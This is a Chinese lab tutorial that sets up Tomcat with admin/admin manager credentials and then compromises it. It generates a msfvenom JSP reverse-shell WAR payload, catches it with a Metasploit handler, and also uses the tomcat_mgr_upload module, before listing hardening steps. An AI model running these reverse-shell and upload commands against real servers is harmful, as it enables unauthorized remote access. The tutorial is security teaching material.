tomcat-搭建-弱口令反弹shell
##tomcat
Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上Tomcat是Apache 服务器的扩展,但运行时它是独立运行的,所以当你运行tomcat 时,它实际上作为一个与Apache 独立的进程单独运行的
01
##tomcat的安装
Java - jdk 百科:
http://www.itcast.cn/news/20201106/11282020480.shtml
#必要的java环境----jdk-8u231-windows-x64
http://dl000.kerwin.cn:8062/csdn/key/5d88cc1375be4927-12012058/auth/1628743688-2021081215480796-0-6f56ca5de33b39b50e111d67a6845ef6
#安装java
Java -version查看是否安装成功
#安装tomcat:默认端口8080
安装host manager
基本设置:
Java默认安装路径 tomcat自动获取
出现这说明安装成功
打开浏览器 ip:8080端口访问
##写入一个jsp的代码看一下这个tomcat是否可以解析:
<% out.println("hello world!"); %>
##tomcat配置
#设置其他人可访问权限:
此目录下
C:\Program Files\Apache Software Foundation\Tomcat 9.0\conf
Tomcat-users.xml文件下
替换为: 账号密码根据自己的设置来替换
<role rolename="manager"/>
<role rolename="admin"/>
<role rolename="admin-gui"/>
<role rolename="manager-gui"/>
<user username="admin" password="admin" roles="admin-gui,manager-gui,manager,admin"/>
#设置能让其他机器连接
此目录下
C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\manager\META-INF
还有\webapps
\META-INF 下
#设置允许上传部署文件大小:
此目录下:
C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\manager\WEB-INF
web.xml这个文件
重启服务
02
##部署jenkins环境
#Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成 [1
Devops---持续集成功能一部分 快速部署 开发者和运维进行快速部署网站的过程 架构 系统
访问jenkins
密钥根据提示获取
创建个管理账户:
03
tomcat弱口令攻击
###Metasploit 进行攻击:百度百科
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
##war 包是一种打包格式
Java web工程,都是打成war包,进行发布,打成war包的好处是不会缺少目录,并且只管理好一个发布文件就好,并且tomcat服务器能够自动识别,将war包放在tomcat容器的webapps下,启动服务,即可运行该项目,该war包会自动解压出一个同名的文件夹。
Tomcat 关闭防火墙---方便我们进行攻击
##两种攻击手段演示:
一般有tomcat弱口令的时候可以进行攻击
#第一种:
生成war的木马:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.123 LPORT=4444 -f war > shell.war
上传war部署到tomcat上
Msf设置监听:
Msfconsole打开msf
Use exploit/mulit/handler
Set payload java/shell_reverse_tcp
Set lhost 192.168.0.123
Set lport 4444
Exploit
去访问一下shell网站
Kali收到了shell
#第二种:
Search tomcat
Use exploit/multi/http/tomcat_mgr_upload
设置好配置信息 然后攻击
得到了一个meterper
04
##tomcat加固防御
1.删除默认页面(这个可以在做完页面后可以做)
2.口令强度(改密码)
3.指定特定的用户ip访问
4.保持版本最新
5.关闭远程访问
6.选择可以上传的文件大小和类型
7.监控一段时间内访问的次数 拉黑机制 实时监控 错五次拉黑多久
8.开放端口选择其他的 8080默认